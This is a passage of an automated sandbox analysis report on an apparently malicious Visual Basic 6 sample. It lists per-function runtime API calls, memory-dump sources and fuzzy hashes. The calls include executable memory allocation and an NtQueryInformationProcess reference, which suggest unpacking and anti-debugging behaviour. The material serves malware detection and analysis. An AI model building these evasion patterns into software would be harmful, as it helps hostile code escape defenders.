                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$LockUnlock$#644$FreeMoveRedim$DestructErrorListSystemUbound
                  • String ID:
                  • API String ID: 1744996622-0
                  • Opcode ID: 7b24046384911871ff618d902ffa382674d29ff28c5a3c6680b3cdabe8fa6b2d
                  • Instruction ID: e63446d4fd8382a4310cd27e240cc6aec999c6504e2c885f817e8de42f298fd5
                  • Opcode Fuzzy Hash: 7b24046384911871ff618d902ffa382674d29ff28c5a3c6680b3cdabe8fa6b2d
                  • Instruction Fuzzy Hash: C771B7B1D0020CAEDB15EFE5D985EDEBBBCAF08314F10416AF214B7251DA799A448F64

                  Control-flow Graph

                  APIs
                  • #644.MSVBVM60(?,004EBCC9), ref: 004FB150
                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000004,?,004EBCC9), ref: 004FB171
                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,?,00003000,00000040,00000000,00000000,00000004,?,004EBCC9), ref: 004FB18D
                  • __vbaAryLock.MSVBVM60(?,?,00000000,00000004,?,004EBCC9), ref: 004FB19C
                  • #644.MSVBVM60(?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1AB
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1B6
                  • __vbaAryLock.MSVBVM60(?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1D7
                  • #644.MSVBVM60(?,?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1E6
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1F1
                    • Part of subcall function 004FB051: __vbaVarVargNofree.MSVBVM60 ref: 004FB08E
                    • Part of subcall function 004FB051: __vbaStrVarVal.MSVBVM60(?,00000000), ref: 004FB098
                    • Part of subcall function 004FB051: #644.MSVBVM60(00000000,?,00000000), ref: 004FB09E
                    • Part of subcall function 004FB051: __vbaVarMove.MSVBVM60(00000000,?,00000000), ref: 004FB0B3
                    • Part of subcall function 004FB051: __vbaFreeStr.MSVBVM60(00000000,?,00000000), ref: 004FB0BB
                  • __vbaAryLock.MSVBVM60(?,00000000,?,00401006,00000000,00000000,?,?,?,?,?,00000000,-00000004,?,?,?), ref: 004FB216
                  • #644.MSVBVM60(?,?,00000000,?,00401006,00000000,00000000,?,?,?,?,?,00000000,-00000004,?,?), ref: 004FB225
                  • __vbaAryUnlock.MSVBVM60(?,?,?,00000000,?,00401006,00000000,00000000,?,?,?,?,?,00000000,-00000004,?), ref: 004FB230
                  • __vbaI4Var.MSVBVM60(?,00000000,00000000,00000000,?,?,?,00000000,?,00401006,00000000,00000000,?,?,?,?), ref: 004FB241
                  • __vbaVarMove.MSVBVM60(00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000,?,00401006,00000000,00000000,?,?), ref: 004FB25D
                  • __vbaFreeVar.MSVBVM60(00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000,?,00401006,00000000,00000000,?,?), ref: 004FB265
                  • __vbaAryDestruct.MSVBVM60(00000000,?,004FB29D,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000,?,00401006,00000000), ref: 004FB297
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$#644$LockUnlock$FreeMove$AllocDestructNofreeRedimVargVirtual
                  • String ID: p"P
                  • API String ID: 606970595-1734977174
                  • Opcode ID: 49ee44f795c8b9655eb9aed4a59bf10f49523497192878aab4157e4e156cbb79
                  • Instruction ID: 029fdda2a3628f635598b8773345b9e9cb9a12365a9098b4897ffc895b0cbcc3
                  • Opcode Fuzzy Hash: 49ee44f795c8b9655eb9aed4a59bf10f49523497192878aab4157e4e156cbb79
                  • Instruction Fuzzy Hash: B6414F71901208AFCB04EBE5CD46E9EBBBDEF09704F10412AF600BB291DB799A05CB94

                  Control-flow Graph

                  APIs
                  • #644.MSVBVM60 ref: 004FA8CE
                  • #644.MSVBVM60(-00000004,00000000), ref: 004FA8E8
                  • #644.MSVBVM60(?,00000000,-00000004,-00000004,00000000), ref: 004FA901
                    • Part of subcall function 004FDCA4: __vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,0000000F,00000000,?,?,?), ref: 004FDD08
                    • Part of subcall function 004FDCA4: __vbaNew.MSVBVM60(0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD1A
                    • Part of subcall function 004FDCA4: __vbaObjSet.MSVBVM60(?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD24
                    • Part of subcall function 004FDCA4: __vbaCastObj.MSVBVM60(00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD2A
                    • Part of subcall function 004FDCA4: __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD34
                    • Part of subcall function 004FDCA4: __vbaObjSetAddref.MSVBVM60(005032AC,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD43
                    • Part of subcall function 004FDCA4: __vbaFreeObjList.MSVBVM60(00000002,?,?,005032AC,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FDD52
                    • Part of subcall function 004FDCA4: __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD66
                    • Part of subcall function 004FDCA4: #644.MSVBVM60(00000000,?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD6C
                    • Part of subcall function 004FDCA4: __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD77
                    • Part of subcall function 004FDCA4: __vbaAryLock.MSVBVM60(004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDA8
                    • Part of subcall function 004FDCA4: #644.MSVBVM60(B445C7BC,004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDBD
                    • Part of subcall function 004FDCA4: __vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDC9
                    • Part of subcall function 004FAB46: __vbaVarDup.MSVBVM60(?,?,?), ref: 004FAB86
                    • Part of subcall function 004FAB46: #644.MSVBVM60(?,?,?), ref: 004FAB91
                    • Part of subcall function 004FAB46: __vbaI4Var.MSVBVM60(?,00000000,?,?,?), ref: 004FAB9B
                    • Part of subcall function 004FAB46: #698.MSVBVM60(?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 004FABD4
                    • Part of subcall function 004FAB46: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABE5
                    • Part of subcall function 004FAB46: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABEF
                    • Part of subcall function 004FAB46: __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABF7
                    • Part of subcall function 004FAB46: __vbaVarAdd.MSVBVM60(?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC1E
                    • Part of subcall function 004FAB46: __vbaVarMove.MSVBVM60(?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC28
                    • Part of subcall function 004FAB46: __vbaFreeVar.MSVBVM60(004FAC63,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC5D
                  • __vbaStrVarMove.MSVBVM60(?,?,00000000), ref: 004FA938
                  • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004FA942
                  • __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 004FA94A
                  • __vbaStrVarMove.MSVBVM60(?,?), ref: 004FA978
                  • __vbaStrMove.MSVBVM60(?,?), ref: 004FA982
                  • __vbaFreeVar.MSVBVM60(?,?), ref: 004FA98A
                  • __vbaNew2.MSVBVM60(00409904,00000000,?,?), ref: 004FA99E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BDB8,00000024), ref: 004FA9DE
                  • __vbaFreeVar.MSVBVM60(00000000,00000000,0040BDB8,00000024), ref: 004FA9E6
                  • #644.MSVBVM60(?), ref: 004FA9EE
                  • #644.MSVBVM60(?,?), ref: 004FA9F8
                  • #644.MSVBVM60(?,?,?,?), ref: 004FAA15
                  • __vbaFreeVar.MSVBVM60(?,00000000,00000008,00000040,?,?,?,?), ref: 004FAA30
                  • __vbaFreeStr.MSVBVM60(004FAA5E,?,00000000,00000008,00000040,?,?,?,?), ref: 004FAA48
                  • __vbaFreeObj.MSVBVM60(004FAA5E,?,00000000,00000008,00000040,?,?,?,?), ref: 004FAA50
                  • __vbaFreeStr.MSVBVM60(004FAA5E,?,00000000,00000008,00000040,?,?,?,?), ref: 004FAA58
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$#644$Move$Addref$#698CastCheckHresultListLockNew2RedimUnlock
                  • String ID:
                  • API String ID: 4040062478-0
                  • Opcode ID: acc528ea567939549293463f0cc3288716861410f189db9aec7b2b8db34f40d5
                  • Instruction ID: a7d6c5a0f1ac3901d9c810be9f80c2cd68cbabe3e797a72f1fdc091d208ba30f
                  • Opcode Fuzzy Hash: acc528ea567939549293463f0cc3288716861410f189db9aec7b2b8db34f40d5
                  • Instruction Fuzzy Hash: 615133B1D00208AFCB15EFA5C945EDEBBB8AF08304F10412EF615BB2A1DB795909CB55

                  Control-flow Graph

                  APIs
                  • #644.MSVBVM60(?,004BDA58), ref: 004FAFBA
                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,00000000,?,004BDA58), ref: 004FAFE1
                  • __vbaAryLock.MSVBVM60(?,?,00000000,00000000,?,004BDA58), ref: 004FAFEF
                  • #644.MSVBVM60(?,?,?,00000000,00000000,?,004BDA58), ref: 004FAFFE
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000000,?,004BDA58), ref: 004FB009
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$#644$LockRedimUnlock
                  • String ID: P"P
                  • API String ID: 3696664841-1596252278
                  • Opcode ID: 7f426ee7d550ae2b9706e85dfed45df7e44756f7e23f026a5ce7ceaa6c1c9f27
                  • Instruction ID: dc8d2fb1f54aebcb24190609aeac22538e622c01d074bb900cabc85364e7c20f
                  • Opcode Fuzzy Hash: 7f426ee7d550ae2b9706e85dfed45df7e44756f7e23f026a5ce7ceaa6c1c9f27
                  • Instruction Fuzzy Hash: E51142B1900219BBCB14EBA5CD46EEF7A7CEB09B14F14025AF610B72D1D77C990087A5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 706 4ffbc3-4ffc07 call 4ff2b6 709 4ffc0c-4ffc12 706->709 710 4ffc14-4ffc1e __vbaNew2 709->710 711 4ffc23-4ffc2f 709->711 710->711 712 4ffc31-4ffc3b __vbaNew2 711->712 713 4ffc40-4ffc5a __vbaObjSetAddref 711->713 712->713 715 4ffc5c-4ffc65 __vbaHresultCheckObj 713->715 716 4ffc6a-4ffc85 __vbaFreeObj 713->716 715->716
                  APIs
                    • Part of subcall function 004FF2B6: __vbaFreeVar.MSVBVM60(00000000), ref: 004FF2EE
                  • __vbaNew2.MSVBVM60(0040C9C4,00503BA8,?,?,?,?,?,?,?,00401006), ref: 004FFC1E
                  • __vbaNew2.MSVBVM60(0040A9A4,00503350,?,?,?,?,?,?,?,00401006), ref: 004FFC3B
                  • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,00401006), ref: 004FFC4C
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000010,?,?,?,?,?,?,?,00401006), ref: 004FFC65
                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401006), ref: 004FFC6D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$FreeNew2$AddrefCheckHresult
                  • String ID:
                  • API String ID: 3631570461-0
                  • Opcode ID: 2aa033e1148bc61624f5aeede4ff4828d23a68183d36074aa3c8353c26f67c8a
                  • Instruction ID: d29f9a0b0f044da0124d0a783bc6a50dd491f7716481699e81bc91bd7035dc88
                  • Opcode Fuzzy Hash: 2aa033e1148bc61624f5aeede4ff4828d23a68183d36074aa3c8353c26f67c8a
                  • Instruction Fuzzy Hash: 3511B271940608FBCB10EF95C886BAE7FB8FF18709F10446BF601B72E1C6785548DA99
                  APIs
                  • #595.MSVBVM60(?,00401006,?,?,?,00000000,00503300,00004008), ref: 004FFAB8
                  • __vbaVarMove.MSVBVM60(?,00401006,?,?,?,00000000,00503300,00004008), ref: 004FFACD
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,00401006,?,?,?,00000000,00503300,00004008), ref: 004FFADC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$#595FreeListMove
                  • String ID: `$P
                  • API String ID: 3966387967-756392544
                  • Opcode ID: 37b824a5361ac6742d3a6563eb537019a95f6f41ad19e112f0c352c1f1e08835
                  • Instruction ID: 891f2b33aea46b267b6743979868d3e0fcb54d0ea9a4c6a18827176b049f0892
                  • Opcode Fuzzy Hash: 37b824a5361ac6742d3a6563eb537019a95f6f41ad19e112f0c352c1f1e08835
                  • Instruction Fuzzy Hash: 5F1127B1C4020CAFCB01DF95DA46BDEBBF8AB08704F20412AF504B6291E7782A08CF55
                  APIs
                  • __vbaSetSystemError.MSVBVM60(000000FF,00000022,?,00000004), ref: 004FF283
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: ErrorSystem__vba
                  • String ID: 0$0$P
                  • API String ID: 2404019520-4139459120
                  • Opcode ID: d799866431c7a18ae4cb7297d6322fe07abcbc91e71e97c2b66de0163396b3f1
                  • Instruction ID: 4d99a0426eab4ee947954a8fff2169128352dc848e46d0ebbec9f58faa289070
                  • Opcode Fuzzy Hash: d799866431c7a18ae4cb7297d6322fe07abcbc91e71e97c2b66de0163396b3f1
                  • Instruction Fuzzy Hash: BBE0ECB5550248BBD710EB95CD06FAE7ABCEB05B14F504359F200765C1D3BD1D04567A
                  APIs
                  • __vbaSetSystemError.MSVBVM60(00000000,00503300,00004008,004FF5B7,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FB37F
                  • __vbaSetSystemError.MSVBVM60(000001F4,00000000,00503300,00004008,004FF5B7,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FB391
                  • __vbaSetSystemError.MSVBVM60(000001F4,00000000,00503300,00004008,004FF5B7,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FB39D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: ErrorSystem__vba
                  • String ID:
                  • API String ID: 2404019520-0
                  • Opcode ID: f7878b6b3736e60cf500dfac49275aed302ffd1d4c5187b4c3af895085e5a324
                  • Instruction ID: 927430da1242c613c9f004ef9172691e53ebef87816ae37726e7f97904a5dec2
                  • Opcode Fuzzy Hash: f7878b6b3736e60cf500dfac49275aed302ffd1d4c5187b4c3af895085e5a324
                  • Instruction Fuzzy Hash: C6D0173BA0002812CA2032BB188BAAF0405898A7A83060A7BF704BB286CA3C4C1142ED
                  APIs
                  • __vbaFreeVar.MSVBVM60(00000000), ref: 004FF2EE
                    • Part of subcall function 004FF318: __vbaFreeVar.MSVBVM60(?), ref: 004FF37D
                    • Part of subcall function 004FF318: __vbaAryLock.MSVBVM60(004FF2F8,005032F8,?), ref: 004FF3B4
                    • Part of subcall function 004FF318: #644.MSVBVM60(89645E5F,004FF2F8,005032F8,?), ref: 004FF3C3
                    • Part of subcall function 004FF318: __vbaAryUnlock.MSVBVM60(004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF3CE
                    • Part of subcall function 004FF318: __vbaObjSet.MSVBVM60(?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF3F7
                    • Part of subcall function 004FF318: __vbaObjSetAddref.MSVBVM60(005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF406
                    • Part of subcall function 004FF318: __vbaFreeObj.MSVBVM60(005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF40E
                    • Part of subcall function 004FF318: __vbaObjSetAddref.MSVBVM60(?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF424
                    • Part of subcall function 004FF318: #644.MSVBVM60(00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF42A
                    • Part of subcall function 004FF318: __vbaFreeObj.MSVBVM60(00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF43B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$#644Addref$LockUnlock
                  • String ID: @$P
                  • API String ID: 419862961-358147200
                  • Opcode ID: 64ff7cefeb3e48a656cd9a0b9cb1555721bb155294c5be21b38783e5cdbb3749
                  • Instruction ID: 91ec96f69dfbd86fdb86f071fbb48f614a563415612bd978ac1dc7c80adad24c
                  • Opcode Fuzzy Hash: 64ff7cefeb3e48a656cd9a0b9cb1555721bb155294c5be21b38783e5cdbb3749
                  • Instruction Fuzzy Hash: 11E0E5B195134CBBCB04EB95CD46FAEB67CFF04B08F50052EF50162551D77C5504867A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID: NtQueryInformationProcess
                  • API String ID: 0-2781105232
                  • Opcode ID: b444e637c2b73fd6c714f4df5b72bdc10b87b3c9654d0bce9194a41c1ad82b9f
                  • Instruction ID: 42160cc89270f790290e1fc4871cb557a562c310d1e13648765bafde3b933096
                  • Opcode Fuzzy Hash: b444e637c2b73fd6c714f4df5b72bdc10b87b3c9654d0bce9194a41c1ad82b9f
                  • Instruction Fuzzy Hash: DBF0A73075C100EEEA70B711CC55F262E5CFB3E714F20446BF406D6192D52CC801911A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149585167.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Offset: 00751000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_751000_UoktqWamLR.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c9baa7ca1d690d2cd8a04312c4355e785f53248baff01656f1cc78200f7d2f94
                  • Instruction ID: 50152dd2288ff9f22d50a686f5f12237d1fe7ff03e59f4068cbd449979ecaf76
                  • Opcode Fuzzy Hash: c9baa7ca1d690d2cd8a04312c4355e785f53248baff01656f1cc78200f7d2f94
                  • Instruction Fuzzy Hash: D521AFCA81EBC05FE7434A3439256922FB16B2365EB4B55DBC881DB0A3F5045A0AE722
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
